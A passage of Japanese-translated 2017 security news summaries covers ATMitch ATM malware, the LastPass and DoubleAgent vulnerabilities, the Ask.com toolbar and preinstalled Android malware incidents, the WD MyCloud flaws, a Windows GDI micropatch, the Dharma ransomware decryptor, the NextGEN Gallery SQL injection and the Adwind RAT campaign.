    'C' - Cancel

     攻撃者が特定のATMの前に仲間がいることを認識すると、彼等は command.txt ファイルに命令をアップロードする。そして、このマルウェアは、命令を実行し、現金を吐き出させるだろう。ログ エントリに基き、このATMが "Catch some money, bitch!" という言葉を、その画面上に表示したと、研究者は確信している。

    襲われるATMを見つけ出すことは殆ど不可能

     このマルウェアは攻撃が終了すると自分自身を削除し、ファイルの全てを処分するので、攻撃者が、このテクニックを使用して、どのくらいの数のATMを空にしたのかは分かっていない。
     分かっているのは、一台のATM上で、このマルウェアが tv.dll と名付けられたファイルを削除し忘れた偶然によるものだけである。更に掘り下げた後、研究者は、このマルウェアが動作する方法を発見し、彼等がこの二月に明らかにした同じグループによってセキュリティ侵害された銀行に辿り着くことができた。
     現時点では、研究者はATMitchでの二つの重大事件(ロシアとカザフスタンで一つづつ)しか見つけ出していないが、彼等はもっと多く発生していると確信している。
     唯一の問題は、ハッキングされた銀行もしくはハッキングされたATMの何れかを検出することが殆ど不可能なことである。これは悪意ある挙動の殆どが、自己削除型マルウェアとメモリ中で実行される悪意あるPowerShellスクリプトを介して実行され、ディスク上に如何なる人為的な結果も残していないためである。銀行のサーバ / コンピュータあるいはATMが再起動されると、手掛かりの殆どはメモリから削除される。
     ATMitchは、キャッシュディスペンサを空にするようにATMを強いる最初のATMマルウェア株ではない。他に知られているウィルス株としては、GreenDispenser、Aliceの最近のバージョン、Ploutus ATMマルウェアがある。


    LastPassに未だ修正されていない未公開の重大な脆弱性
    GrahamCluley : News (2017/03/30)
     人気のパスワード管理企業LastPassが、現在、そのブラウザ拡張中のクライアントサイドの脆弱性の修正プロセス中にある。これは、セキュリティ研究者がResponsible Disclosure(【訳注】 ソフトウェアベンダー等から修正プログラムが公開されるまで、つまり利用者が対策を実施できるようになるまでは、情報公開を行わない事が最も安全である、という考え方(Microsoft TechNetより))したものである。
     03月24日の週末に渡り、Googleの脆弱性研究者Tavis Ormandyは、LastPassパスワード マネージャ用のブラウザ拡張中に、コード実行を達成するための方法を発見したとツイートした。
     アンチウィルス製品中に多くのフローを発見してきたOrmandyは、(今回)脆弱性攻撃がどのように動作するのかを公に発表しないことによってResponsible Disclosureの倫理に固執した。
     代わりに、Ormandyは直接LastPassに接触した。
     次に、数年に渡りセキュリティホールを修正してきたこのパスワード マネージャは、Ormandyの公表を公に認めるために二日間を要した。彼等は、この悪用の詳細に関しては何も発表していない。
     LastPassはブログで以下のように説明している:

     「我々は現在、積極的にこの脆弱性を解決中である。この攻撃は、一意であり極めて高度である。我々は、この脆弱性に関する具体的なことや、高度ではない邪悪な団体に対して何らかのことを明らかにすることになるであろう我々の修正を公開しようとは思わない。そこで、この作業が終了するまで、あなたは自己分析の詳細を得ることはできないだろう。」
     「他方、我々は、LastPassのオンラインセキュリティの水準を引き上げることを支援し、LastPassを市場で最も安全なパスワード マネージャにしようとし続けている我々のチームと共同作業したTavisのような人々に感謝したい。」

     ベンダが、Responsible Disclosureを介して彼等のセキュリティを改善するために支援する研究者に感謝しているのを見るのは常に嬉しいことである。全ての企業が、このように丁寧に対応しているわけではない。一部の企業は、彼等が最善を尽くすことが、誠実な方法でセキュリティを進歩させるとして研究者を締め出している
     LastPassは現在、Ormandyによって公開された脆弱性を修正するための作業中である。LastPassに関して悩むより、この研究者によって発見された他のセキュリティ上の脆弱性がパッチされた数日後に、このセキュリティホールだけが通知されたことを心に描いてみよう。
     作業中であるが、LastPassは、ユーザに三つのことを実行するように推奨している。

     一つ目、ユーザは、ブラウザ拡張からではなく、LastPassの金庫室から直接サイトを起動するように促している(LastPassのスマートフォン アプリケーション バージョンは影響を受けないと考えられている)。
     二つ目、ユーザの証明書をフィッシングしようとする疑わいいリンクやeMail添付ファイルに目を光らせるようにユーザに忠告している。
     三つ目、この機能を提供しているありとあらゆるアカウントに二段階認証を実装するように顧客にアドバイスしている。


    アンチ-ウィルス ソフトウェアをハイジャックするためにMicrosoftのアプリケーション ベリファイアを使用する新しい攻撃
    BleepingComputer : News>Security (2017/03/17)


    DoubleAgent攻撃で改竄されたNortonアンチウィルス ユーザ インターフェース

     Cybellumの研究者によって発見されDoubleAgentと名付けられた新しいテクニックは、攻撃者がセキュリティ製品をハイジャックし、それらに悪意ある行動を取るようにすることを可能にするものである。
     DoubleAgent攻撃は、他のアプリケーションの内部に悪意あるコードをロードするためにMicrosoftのアプリケーション ベリファイアを悪用する方法を、Cybellumの研究者が発見したことで明らかになった。

    DoubleAgent攻撃はMicrosoftのアプリケーション ベリファイアを悪用している

     Microsoftアプリケーション ベリファイアは、開発者がランタイムにコードのエラーを検証するためのツールである。このツールは、全てのWindowsのバージョンに搭載されており、開発者がチェックしたいアプリケーション内部でDLLをロードすることによって動作する。
     Cybellumの研究者は、開発者がMicrosoftが公式に提供しているアプリケーション ベリファイアの代わりに、開発者独自の"verifier DLL"をロードできることを発見した。
     単純にWindowsレジストリ キーを作成することで、攻撃者はハイジャックしたいアプリケーションを指定し、次に、正規のプロセス中に挿入したい攻撃者独自のペテン用のDLLを提供することが可能になる。
     幾つかのアンチウィルス メーカーが影響を受けている。
     Cybellumの研究者は、今日のセキュリティ製品の大部分がDoubleAgent攻撃の影響を受けやすい状態にあると発言している。影響を受ける製品のリストは以下である。

      Avast (CVE-2017-5567)
      AVG (CVE-2017-5566)
      Avira (CVE-2017-6417)
      Bitdefender (CVE-2017-6186)
      Trend Micro (CVE-2017-5565)
      Comodo
      ESET
      F-Secure
      Kaspersky
      Malwarebytes
      McAfee
      Panda
      Quick Heal
      Norton

     「我々は90日以上前に全てのベンダに対してDoubleAgentについて通告し、そして、幾つかのベンダと共同作業した」と、Michael Engstler(CybellumのCTO)は、Bleeping Computerへのメール中で発言している。
     記述している時点で、「パッチをリリースしたベンダは、Malwarebytes (バージョン番号: 3.0.6 Component Update 3), AVG (バージョン番号: 16.151.8007), Trend-Micro(まもなくリリースされる) 」と、Engstlerは付け加えている。

    DoubleAgentはセキュリティ製品をマルウェアに変える

    DoubleAgent攻撃は、セキュリティ製品をハイジャックし、効果的に無効化するので、極めて危険である。攻撃者のスキル レベルに応じて、攻撃者は、悪意あるコードをロードするために、以下のようにしてDoubleAgentフローを使用している。

      ・ セキュリティ製品をOFFにする
      ・ セキュリティ製品を特定のマルウェアや攻撃に対して識別不能にする
      ・ ローカル コンピュータ / ネットワーク上で攻撃を起動するためにセキュリティ製品をプロキシのように使用する
      ・ 全ての悪意あるコードのユーザ特権レベルを昇格させる(セキュリティ製品は一般的に最高の特権で稼働している)
      ・ 悪意あるトラフィックを隠蔽したり、あるいは、データをコッソリ持ち出すためにセキュリティ製品を使用する
      ・ OSやコンピュータにダメージを与える
      ・ DoS(Denial of Service)を発生させる

     計画的に、DobuleAgent攻撃は、コード挿入テクニックと永続的メカニズムの両方である。これは、レジストリキーのおかげで、攻撃者がブート毎にターゲットプロセスに悪意あるDLLを再挿入することが可能なためである。

    DoubleAgent攻撃は全てのソフトウェアに影響を与える

    Cybellumチームが、アンチウィルス ソフトウェアに関する研究に焦点をあてていたとしても、DoubleAgentをセキュリティ製品のみへの脅威として考えてはならない。
     DoubleAgentが悪用している脆弱性(取り分け、あらゆるプロセスへのコード挿入の能力)は、DoubleAgentを、Windows OSそれ自体を含むあらゆるアプリケーションに対する脅威にしている。
     このフローを発見し、セキュリティ ベンダの製品にパッチをあてるために、セキュリティ ベンダと共同作業したEngstlerは、DoubleAgentは、万人に対する脅威であると発言している。
     「この脅威は、あらゆるアプリケーション(オペーレーティング システムそれ自体さえ)をハイジャックするために使用することができる」と、「如何なる形であれ、我々のPOC(Proof-of-Concept、概念の実証)コードを変更する必要はなく、要求されたアプリケーション名で、それを実行するだけである。そこで、DoubleAgentは、自動的に、そのアプリケーションを攻撃するだろう。そのアプリケーションがアンチウィルスであろうと別のアプリケーションであろうと、それは重要なことではない」と、このエキスパートはBleepingComputerに告げている。
     彼が言及しているProof-of-Concept(概念の実証)コードは、GitHubで利用可能である。この攻撃を詳細に説明しているブログ ポスト(一般的な、そして、テクニカル レベル)は、明日(3月22日)、公開されるだろう。コチラのYouTubeビデオ(DoubleAgent Zero-Day Attacking Norton Antivirus)は、活動しているDoubleAgent攻撃を示している。
     Cybellumは、セキュリティ ベンダがMicrosoftのProtected Processesメカニズムを使用するように推奨している。この機能は、MicrosoftによってWindows 8.1 で導入された。
     Protected Processesは、Microsoftがアンチ-マルウェア サービス用に特別に設計したセキュリティシステムである。そして、Protected Processesは、アンチ-マルウェアのプロセスをラッピングし、他のアプリケーションに未署名のコードが挿入されることを許可しないように動作する。
     全てのセキュリティ製品の内、唯一Windows Defenderだけが、現在Protected Processesを使用している。


    Ask.comツールバー ネットワークが二ヶ月で二回セキュリティ侵害されていた
    BleepingComputer : News>Security (2017/03/17)
     Ask Partner Network(APN)は、サイバー犯罪者に、Ask.com Toolbarを稼働しているコンピュータにマルウェアを配布する方法を発見されたことにより、二ヶ月で二回セキュリティ侵害されていた。
     最初の攻撃は、2016年10月の終わりと11月の初めに発生し、Red Canaryのセキュリティ研究者達によって発見された。2回目は12月に発生した。これは、APNがネットワークをクリーンにし、Carbon Blackセキュリティ製品で増強した後のことであった。
     二つのインシデントは、攻撃者がAPNネットワークを破り、Ask.comツールバー アップデート プロセスをハイジャックする方法を発見したということでは類似のインシデントである。そして、これは影響を受けたコンピュータにマルウェアをインストールされる結果となった。

    攻撃者は、Ask.comツールバー アップデート プロセスをハイジャックしていた

     最初の攻撃では、サイバー犯罪者は、悪意あるプロセスを生み出すためにPNGファイルを使用したアップデートパッケージをダウンロードしインストールするためにAsk.comツールバー アップデート プロセスを改竄した。
     この幾分か基準外の挙動は、この攻撃を検出し警告を発したRed Canaryによって感知されたが、これはサイバー犯罪者が凡そ10人の犠牲者をセキュリティ侵害した後のことであった。
    APNは、彼等のネットワークに介入し、クリーンにし、サイバー犯罪者が悪意あるアップデート パッケージに署名するために使用されていたデジタル証明書(彼等の名前で発行されていた)を無効にした。次に、APNは、以降のアップデートの署名用の新しいデジタル証明書を発行した。

    二回目の攻撃は犠牲者のPCにRATをインストールした

     Carbon Blackの研究者達は、攻撃者が、何らかの方法で、この新しいデジタル証明書を手に入れ、二回目の悪意あるアップデートプロセスに署名するために、それを使用したと発言している。
     新たな攻撃は、12月16日に起動され、サイバー犯罪者は同一のオペレーション モード(Ask.com Toolbarユーザに悪意あるアプデートを送信する)を使用した。この悪意あるアップデートがインストールされると、犠牲者のコンピュータにリモートアクセス トロイ(RAT、【訳注】 ネズミのように見えないところで活動していることから、広義には遠隔操作を可能にするツール全般を意味するが、狭義にはトロイの木馬型(またはバックドア型)マルウェアを指す(ESET-キャノンITソリューションズより))をダウンロードしインストールする。
     一台の犠牲者のPCのログに基づくと、攻撃者は犠牲者のコンピュータ上でリバース コマンドシェルを開くために、このRATを使用したと、Carbon Blackは発言している。この全ては、悪意あるアップデートが配布された後、60秒で発生していた。
     Ask.com Toolbarは、システム権限で実行されているため、攻撃者は彼等が好む如何なるソフトウェア、如何なるコマンドを実行しようと何の問題もなかった。
     その後の二時間の間に、攻撃者は犠牲者のコンピュータに新しいツールをダウンロードしていたとCarbon Blackは発言している。攻撃者は、ローカルネットワークに関するリソースを列挙し、ローカルシステムから証明書をダンプし、盗んだ証明書を使用して他のシステムにラテラルに移動し、将来のアクセスを目的とする永続的メカニズムを構築するために、これらのツールを使用したと、Carbon Blackは発言している。

    新たな攻撃は検出されていない

     この二回目の攻撃で使用されたRATは、最初の攻撃の後に発行されたAPN認証で署名されていた。これは十中八九、最初の攻撃の後にエンジニアがサーバーをクリーンにした後も、攻撃者がAPNネットワーク上に足掛かりを維持していたことを意味している。
     この三ヶ月間APNネットワークから新しい悪意ある攻撃が検出されていないと、Carbon Blackがレポートしているので、今度こそ、APNはより適切な仕事をしているようである。


    3ダース余りの様々なAndroidデバイスにプレインストールされたマルウェアが発見された
    GrahamCluley : News (2017/03/13)
     個人情報取得マルウェア、粗末な広告ネットワーク形式のマルウェア、身代金要求型マルウェアもが、3ダース余りの異なるモデルのAndroidデバイスにプレインストールされていた。
     Check Pointの研究者達は、電気通信会社や多国籍テクノロジー企業による38のAndroidデバイス(【訳注】 3/13 のCheck Pointのアップデートで36に減少)上のマルウェアに気づいた。
     影響を受けるデバイスは以下。

      Galaxy A5
      Galaxy Note 2
      LG G4
      Galaxy S7
      Galaxy S4
      Galaxy Note 4
      Galaxy Note 5
      Galaxy Note 8     (【訳注】 3/13のアップデートで、8.0に変更された)
      Xiaomi Mi 4i
      ZTE x500
      Galaxy Note 3
      Galaxy Note Edge
      Galaxy Tab S2
      Galaxy Tab 2
      Oppo N3
      vivo X6 plus
      Nexus 5     (【訳注】 3/13のアップデートで削除された)
      Nexus 5X     (【訳注】 3/13のアップデートで削除された)
      Asus Zenfone 2
      LenovoS90
      OppoR7 plus
      Xiaomi Redmi
      Lenovo A850

     スマートフォンやコンピュータのような電子デバイス ベンダは、ROMに格納したデータと共に製品を出荷している。ROM(read-only memoryの頭文字)は、電源がOFFの場合でさえデータを維持するストレージ媒体である。従って、BIOS(basic input and output instructions)やファームウェア アップデートのような重要な情報を保管するために使用される。
     プレインストールされたマルウェアに関しては、この悪意あるソフトウェアは通常ROMに搭載されて出荷される。しかし、これは必ずしもベンダーに責任があることを意味していない。Check Pointのチームはブログ ポストで、この点を詳細に述べている

     「この悪意あるソフトウェアは、ベンダによって提供される公式のROMの一部ではなく、流通過程の何処かで追加されたものである。このマルウェアの内の6つは、悪意に満ちた役割を持つ者によってシステム権限を使用してデバイスのROMに追加されている。これは、ユーザによって削除することができず、デバイスのROMを焼き直す必要があることを意味している」

     では、プレインストールされたマルウェアは何を実行するのか?
     大部分の望ましくないソフトウェアは、情報を盗むか、悪意ある広告ネットワークの何れかである。例えば、Lokiマルウェアの変種は、感染したデバイスを悪用して不正な広告を表示し、このマルウェアの所有者に収益をもたらそうとする。このマルウェアはまた、個人情報を盗み、永続性を勝ち取ることを可能にするために、それ自身をシステムにインストールする。
     しかしながら、この群の中に幾つかの例外がある。特に、研究者達はSlockerの一つのインスタンスに着目している。これはAES暗号化を用いてデバイスのファイル全てを暗号化し、復号キーのために身代金を要求するモバイル身代金要求型マルウェアである。
     これらの脅威に対する論点のはぐらかし: マルウェアのプレインストール今に始まったことではないので、ユーザはそれに対して自分自身を保護するために、あらゆることを実行することができる。
     簡単な答え: 最善の策は、最終的に購入を決定する前にデバイスとベンダを完全に研究することである。デバイスを決定したら、サードパーティーの販売者からではなく、直接ベンダから購入することである。
     これで、プレインストールされるマルウェアに対する保護責任はベンダ側に存することとなる。組織は、デバイスの供給業者に順守監査を実施することで、彼等のサプライチェーンを安全にする必要がある。最小権限のモデルを使用することや、契約者の役割を分離することは、悪い考えではない。


    Western DigtalのNASハードドライブに複数の未パッチの脆弱性が発見された
    BleepingComputer : News>Security (2017/03/02)
     複数のWestern Digtal MyCloud Networked Attached Storage Device(NAS、ネットワーク接続ストレージ デバイス)は、酷さは異なるものの幾つかのセキュリティ フロー(攻撃者が認証をバイパスすることが可能、そのデバイス上でコードの実行が可能、ユーザのデータをアップロードしたりダウンロードすることが可能)の影響を受ける。
     これらのセキュリティ フローは、Zenofexと名乗るセキュリティ研究者によって発見され、Western Digitalには通知されておらず、未パッチのままであり、公開された悪用コードは、その半分を超える脆弱性に利用可能である。

    影響を受ける複数のMyCloudモデル

     Zenofexによると、影響を受ける複数のWD MyCloud NASデバイス モデルは以下である。

      My Cloud
      My Cloud Gen 2
      My Cloud Mirror
      My Cloud PR2100
      My Cloud PR4100
      My Cloud EX2 Ultra
      My Cloud EX2
      My Cloud EX4
      My Cloud EX2100
      My Cloud EX4100
      My Cloud DL2100
      My Cloud DL4100

     ZenofexがWestern Digitalに通知しないことの決定は、他のインフォセック専門家達が、報告された脆弱性をWestern Digitalが無視していることに不平不満をぶつけた、昨年のセキュリティ カンファレンスに、この研究者が出席した後のことである。
     同じカンファレンス(Black Hat USA 2016)で、Western Digitalは、"Lamest Vendor Response"(最も不十分なベンダ対応)でPwnie Award(【訳注】 オニー賞、セキュリティ分野などの不名誉を表彰するジョーク的な賞。2011年にはSONYが受賞)を受賞している。
     「これらのバグを無視することは、責任ある対応がなされるまでの長期間に渡り脆弱性あるデバイスをオンラインに放置することである」と、Zenofixは、Western Digitalが、このセキュリティバグをパッチするのを待たずに公開を決定した論拠としている。
     「我々はフローのコミュニティに警告することを試みる代わりに、可能な限りアクセスを制限するために、ユーザが彼等のネットワークの公に直面する部分から彼等のデバイスを切り離すことを希望する」と、彼は追加している。

    発見された85のセキュリティ フロー

     Exploitee.rsコミュニティのメンバーであるZenofexは、とてつもなく大きな全部で85のセキュリティ ホールを発見したと発言している。概念の証明コードは、Exploitee.rs Wikiで、これらの脆弱性の48に関して利用可能である。
     この弱点を突くコードに基づくと、これらのセキュリティフローの多くは、クッキーの値を変更することによって、あるいは、クッキー パラメータ中にシェルコマンドを埋め込むことによって悪用することができる。
     より複雑な攻撃のシナリオは、MyCloud NAS所有者が訪問する可能性のあるWebサイト上のImageタグ内部に悪意あるコードを埋め込むことを含む。訪問者のブラウザ内部に画像がロードされると、この悪意あるコードは、ロカルNASドライブに対して実行され、このデバイスを乗っ取る。
     nuit によるTweetはコチラ
     Zenofexによると、これらの問題の内、最も深刻なのは、認証のバイパス問題である。そして、皮肉にも、クッキー セッション パラメータの改善だけしか要求しない最も簡単に悪用できる脆弱性である。
     皮肉にも、Zenofexがログイン バイパス問題を調査している間に、Western Digitalは、そのログイン メカニズムに新たなバグを導入したMyCloudファームウェアのアップデートをリリースした。この新たなログイン メカニズムのバグは、攻撃者がクッキー パラメータを介してシェル コマンドを埋め込むことで、ログインメカニズムを使用するコードを実行することができる。
     この特定の問題は深刻であり展開してはいるものの、他のフローを無視してはならない。一部は、MyCloudデバイス上でシェルコマンドを実行する権利を攻撃者に許諾するので、リモートコード実行を可能にしている。  そして、マーフィーの法則が同様にハードウェア デバイスに適用されている間は、物事は全て間違った方向に進む。コマンドは限定されたユーザ権限では実行されない、しかし、ルート権限では実行され、攻撃者に影響を受けるデバイスの完全制御を与え、気の向くままにデータをアップロードしたりダウンロードしたりすることを可能にする。
     これが、Zenofexによって記録された、活動中の幾つかのセキュリティフローを示したビデオである。


    サードパーティのベンダがWindows GDI脆弱性用の臨時のパッチをリリースした
    BleepingComputer : News>Security (2017/03/02)
     Google Project Zeroのセキュリティ研究者によって発見され、Microsoftがパッチしないまま放置している脆弱性に関して、サードパーティのセキュリティ ベンダACROS Securityが臨時のパッチをリリースした。
     CVE-2017-0038で追跡されるこの脆弱性は、Windows GDIライブラリ中のバグである。これは、ビデオ ディスプレイとローカル プリンタにデータが送信されている時の両方で、Windowsがグラフィックスとフォーマットされたテキストを処理するために使用するライブラリである。
     Googleの研究者によると、攻撃者は、犠牲者のメモリ中に発見されたデータを暴くために悪意あるEMFファイルを活用することができる。これは次に、ASLRプロテクションをバイパスし、ユーザのコンピュータ上でコードを実行するために活用される。
     「私は、この脆弱性がInternet Explorer中でローカルに、Office Onlineでリモートに、特別に細工されたEMFファイルを含む .docx ドキュメントを介して再現されることを確認した」と、このバグを発見したGoogleのエンジニアMateusz Jurczykは説明している。

    この問題はMicrosoftが2月の定例パッチを延期したので未パッチのまま残されている

     この問題は、昨年Microsoftに通知され、2016年06月にパッチ(MS16-074)されたという事実がある。このパッチをテストしたJurczykは、彼の当初のレポートで、通知した問題を完全に修正することに、このパッチは失敗していたので、昨年11月、Microsoftに対して、この問題を改めて提示したと発言していた。
     Jurczykは、90日間(Googleが製品を安全にするために企業に与えている標準猶予期間)待ち、次に、彼の二度目の発見を公開した。
     彼のアナウンスは、Microsoftが2月のセキュリティアップデートを来月のパッチの火曜日(03月15日にスケジュールされている)まで遅延した後に出現している。

    ACROS Securityは、臨時のパッチを配布している

     その間に、ACROS Securityは、0patch(0-Day、未パッチの脆弱性、期限切れ、サポートされていない製品、時代に合わなくなったOS、脆弱性のあるサードパーティー コンポーネント、カスタマイズされたソフトウェアに修正を適用するためのプラットフォーム)と呼ばれる製品を経由してWindowsコンピュータに適用することのできる臨時のパッチを発行した。
     このパッチは、0patch Agentクライアントを介して無料で適用される。このパッチは閲覧可能でありコチラからダウンロード(直リンク)することができる。
     このパッチは、以下のプラットフォーム(Windows 10 64bit, Windows 8.1 64bit, Windows 7 64bit, Windows 7 32bit)で利用できる。
     「最も深刻な問題というわけではないが、私は、(テストで使用された)虹の画像の代わりに、悪意あるページが私のオンライン バンキング アカウントへの証明書を盗むことができたり、あるいは、私のブラウザのメモリから、昨晩のパーティー後の私の写真を掴み取ることができると考えると身震いがする」と、0patchチームのメンバーLuka Treiberは発言している。
     「此処で留意すべきは、Microsoftのアップデートが、この問題を修正し、脆弱性のあるgdi32.dllが置き換えられると、我々のパッチは、このDLLの脆弱性のあるバージョンに正確に結び付けられているので、自動的に適用は中止される」と、Treiberは付け加えている
     CVE-2017-0038への攻撃がパッチの前後で、どのように挙動するかを示すビデオは以下で利用可能である。

    https://youtu.be/LWx3mERvgdo

    Windows GDI問題とは別に、Google Project Zeroの研究者達は、二つ目の未パッチのMicrosoftの脆弱性の詳細を公開した。この問題は、EdgeとInternet Explorerに影響を与える。


    Kasperskyが、Dharma身代金要求型マルウェア用の復号プログラムをリリース
    BleepingComputer : News>Security (2017/03/02)
     昨日、私はDharma身代金要求型マルウェア用のマスター復号キーと主張するものが BleepingComputer.com のフォーラムに投稿されたことを記述した。これはCrysis(Dharmaはこれに基づく)用のキーがリリースされたのと同じ方法で実行された。
     Kasperskyは、このキーをテストし、本物でありDharmaがファイルを暗号化するために使用したものであると決定した。これらのキーは、彼等のRakhniDecryptor中に導入された。そして、私は、この復号プログラムをDharma感染に対してテストし、完全に動作することを確認した。
     Dharma身代金要求型マルウェアに感染し、依然として暗号化されたままのファイルを持っている人々のために、この感染の犠牲者は、以下のガイドを使用して、無料でファイルを復号することができる。ファイルを復号するにあたり支援を必要とするのであれば、遠慮無くDharma Ransomware Help & Support Topicで質問しなさい。
    アップデート 2017/03/02、午前10:08(米国東部時間)
     この記事を投稿した直後に、私は、ESETがDharma身代金要求型マルウェアをサポートするように復号プログラムのアップデートをリリースしたことを確認した。詳細情報はコチラ

    RakhniDecriptorを使用してDharmaで暗号化されたファイルを復号する方法

     Dharma身代金要求型マルウェアの犠牲者は、彼等のファイルが暗号化され、[filename].[email_address].dharma のフォーマットにリネームされていることで、Dharma身代金要求型マルウェアの犠牲者であることを特定できる。例えば、最近の変種は、ファイル名 test.jpg を test.jpg.[tombit@india.com].dharma にリネームし暗号化する。暗号化されたファイルの例は、以下に見られる。


    Dharmaで暗号化されたファイル

     今までに確認された他の変種の一部は、以下を含んでいる。

    .[3angle@india.com].dharma
    .[amagnus@india.com].dharma
    .[base_optimal@india.com].dharma
    .[bitcoin143@india.com].dharma
    .[blackeyes@india.com].dharma
    .[doctor.crystal@mail.com].dharma
    .[dr_crystal@india.com].dharma
    .[emmacherry@india.com].dharma
    .[google_plex@163.com].dharma
    .[mr_lock@mail.com].dharma
    .[opened@india.com].dharma
    .[oron@india.com].dharma
    .[payforhelp@india.com].dharma
    .[savedata@india.com].dharma
    .[singular@india.com].dharma
    .[suppforhelp@india.com].dharma
    .[SupportForYou@india.com].dharma
    .[tombit@india.com].dharma
    .[worm01@india.com].dharma

    Dharma身代金要求型マルウェアで暗号化されたファイルを復号するには、RakhniDecryptor をダウンロードする(直リンク)必要がある。ダウンロードしたら、このプログラムを解凍し、実行する。この復号プログラムが起動すると、以下に示すメイン スクリーンが表示される。


    RakhniDecryptor

     始める前に、あなたが必ずバージョン 1.17.17.0 を使用していることを保証しなさい。このバージョンが、Dharma身代金要求型マルウェアをサポートしている。RakhniDecryptorのバージョンを確認するには、上の画面の左下にある About ボタンをクリックしなさい。これは RakhniDecryptorのバージョンを示す小さなウィンドウを表示する。


    バージョンを表示する About 画面

     あなたがバージョン 1.17.17.0以降を使用しているのであれば、Start scanボタンをクリックしなさい。そうすると、RakhniDecryptorは、暗号化されたファイルを選択するように促してくる。Dharmaで暗号化されたファイルを含むフォルダに移動し、.Word, Excel, PDF, music, imageファイルを選択しなさい。テキスト ファイルは残りのファイルを復号するために使用することができないので選択しないようにしなさい。


    Dharmaで暗号化されたファイルを選択する

     ファイルを選択したら、Openボタンをクリックする。これで、RakhniDecryptorは、暗号化されたファイルに関してコンピュータ全体をスキャンし、それらを復号する。


    Dharmaで暗号化されたファイルをスキャン中

     このプロセスには、かなりの時間がかかるので、この復号プログラムが、あなたのコンピュータをスキャンし、ファイルを復号するまで辛抱しなさい。
     終了したら、以下のような完了画面が表示される。


    復号完了

     ここで、この復号プログラムで復号されたDharmaファイルの完全なリストを確認するために、detailsリンク(上図のProcessed行の右端)をクリックしなさい。


    スキャン結果のページ

     ここで、RakhniDecryptorを終了する。あなたは再びファイルにアクセスできるはずである。
     あなたのファイルが復号された場合でさえ、オリジナルの暗号化されたファイルは残ったままになっていることに注意しなさい。


    復号されたファイルが存在するフォルダ

     バックアップされている暗号化されたファイルを掃除するには、この暗号化されたファイルを、アーカイブもしくは削除しても差し支えない別のフォルダに移動するためにCryptoSearchを使用しなさい。


    100万を超えるWebサイトがWordPress Galleryプラグインのフローのリスクがある
    The State Of Security : News (2017/03/02)
     NextGEN Galleryは、自己ホスト型WordPress Webサイトで大変人気のあるプラグインであり、1650万回ダウンロードされている。
     このソフトウェアの幅広い人気(2007年以来、「業界標準のWordPressプラグイン」であると主張している)は、彼等のサイトにイメージ ギャラリーを追加することに関心を持っているWebサイトのオーナーにとって、一見して明らかな選択肢になっている。
     Sucuriの研究者達は、NextGEN Galleryのコードに、ハッシュされたパスワードやWordPress秘密鍵のような重要な情報を盗むために、悪意ある攻撃者が使用することのできる深刻なSQL挿入の脆弱性があることを明らかにした。

     この脆弱性は、少なくとも二つのシナリオで攻撃者が悪用することができる。
       ・ あなたのサイトで NextGEN Basic TagCloud Gallery を使用している場合、もしくは、
       ・ あなたのユーザ(寄稿者)がレビューしてもらうための投稿を可能にしている場合
     これらのケースの何れかに該当する場合、あなたは明らかにリスクがある。
     この問題は、NextGEN Galleryが、SQLクエリーを用意しているWordPressでサニタイズされた(【訳注】 入力されたデータの危険な部分を無力化する操作)ユーザ インプットを不適切に許可しているために存在していた。これは、基本的に、生のSQLクエリー内部にユーザインプットを追加することと同じである。この攻撃ベクトルを使用して、攻撃者は、ハッシュされたパスワードや、或る形態のWordPress秘密鍵をリークすることが可能になる。

     幸いなことに、このセキュリティの脆弱性は、このプラグインのバージョン2.1.79でパッチされている。もちろん、 Imagely(NextGEN Galleryプラグインの開発者)が、修正したバージョンをリリースしたからといって、この話が終わるわけではない。
     影響を受けるWebサイトは、彼等のWordPressプラグインのバージョンがアップデートされていることを保証する必要がある。
     そして、多くのサイトが、NextGEN Galleryの2.1.79にアップデートすることの重要性を認識していない。結局、このプラグインの所有するチェンジログに記述されている緊急のセキュリティ上の脆弱性の修正は、参照されていない。

     あなたは、このフローに関して触れられていることと、修正がリリースされている事実を発見するには、このプラグインのサポートフォーラムを掘り下げる必要がある。
     多くのWordPress稼働型のWebサイトは、サードパーティ製の多くのプラグインを使用している。これは、あなたのコンピュータ上の他のソフトウェア同様に、プラグインのアップデートを維持することと、セキュリティ脆弱性に対する防御が重要であることを意味している。
     プラグインが開発者によって杜撰にコーディングされている場合、常にあなたのWebサイトはセキュリティ侵害されるリスクがあるし、訪問者のコンピュータを危険に晒すことになる。
     有難いことに、今回の場合、この脆弱性は潜在的に問題のあるプラグイン開発者に、責任を持って通知するセキュリティ企業によって発見された。そして、この責任は、このプラグインの最新バージョンをダウンロードし、彼等のサイトにそれを適用するWebサイトの管理者に存在している。
     私はただ、Imagely(NextGEN Galleryの開発者)が、彼等の数百万のユーザに、最新のプラグインアップデートをもっと告げることを希望する。


    100ヶ国以上1500の企業が、悪意あるAdwindバックドアRATで攻撃されている
    Graham Cluley : News (2017/02/28)
     100ヶ国以上1500を超える企業がAdwind Remote Access Tool(RAT、【訳注】 ネズミのように見えないところで活動していることから、広義には遠隔操作を可能にするツール全般を意味するが、狭義にはトロイの木馬型(またはバックドア型)マルウェアを指す(ESET Keyword Encyclopediaより))で感染させられている。
     Kaspersky Labの研究者によって発見された、この新しい攻撃作戦は、Adwind(2013年以来、45万人を超える個人(Mac愛好者を含む)をターゲットにしてきた多機能型バックドア)が、企業を餌食にすることを好きになったことを示唆している。
     Adwindマルウェア(AlienSpy, Frutas, Unrecom, Sockrat, jRATとしても知られる)は、取り分け、流通に魅力を感じているようであり、凡そ1/5が、このカテゴリに該当している。しかし、Adwindは、殆ど選り好みをしない。このマルウェアはまた、建築、輸送、土建、保険、法曹界の組織も食い物にしている。


    ターゲットにされている産業別Top 10

     この攻撃は、企業がHSBC(【訳注】 英国を本拠とする世界最大級のメガバンク)のようなところからeMailを受け取ることで始まる。このeMailは、2013年以来アクティブである mail.hsbcnet.hsbc.com ドメインから出発している。このメッセージには、付属の添付ファイルは受領者用の支払い通知を含んでいると記されている。
     しかし、添付ファイルには、そのようなものは含まれていない。Kasperskyは警告中で以下のように説明している。

     「通知の代わりに、この添付ファイルはマルウェアのサンプルを含んでいる。ターゲットにされたユーザが添付されているZIPファイル(この中にRARファイルが含まれている)を開くと、このマルウェアは、自己インストールし、そのコマンド&コントロール サーバと通信しようとする。このマルウェアは、攻撃者が、セキュリティ侵害されたデバイスの制御をほぼ完全に獲得し、感染したコンピュータから秘密情報を盗むことを可能にする。」

     (誤解のないように言うと、このZIPファイルそれ自体を開いても何ら傷つけられることはないが、このZIPアーカイブに含まれるJARファイルを開くと、コンピュータは感染する。)
     接続が確立すると、攻撃者は、感染したコンピュータから極秘情報を盗むためにAdwindを使用する。これは、ビジネスに関連する重要な情報を含んでいる。


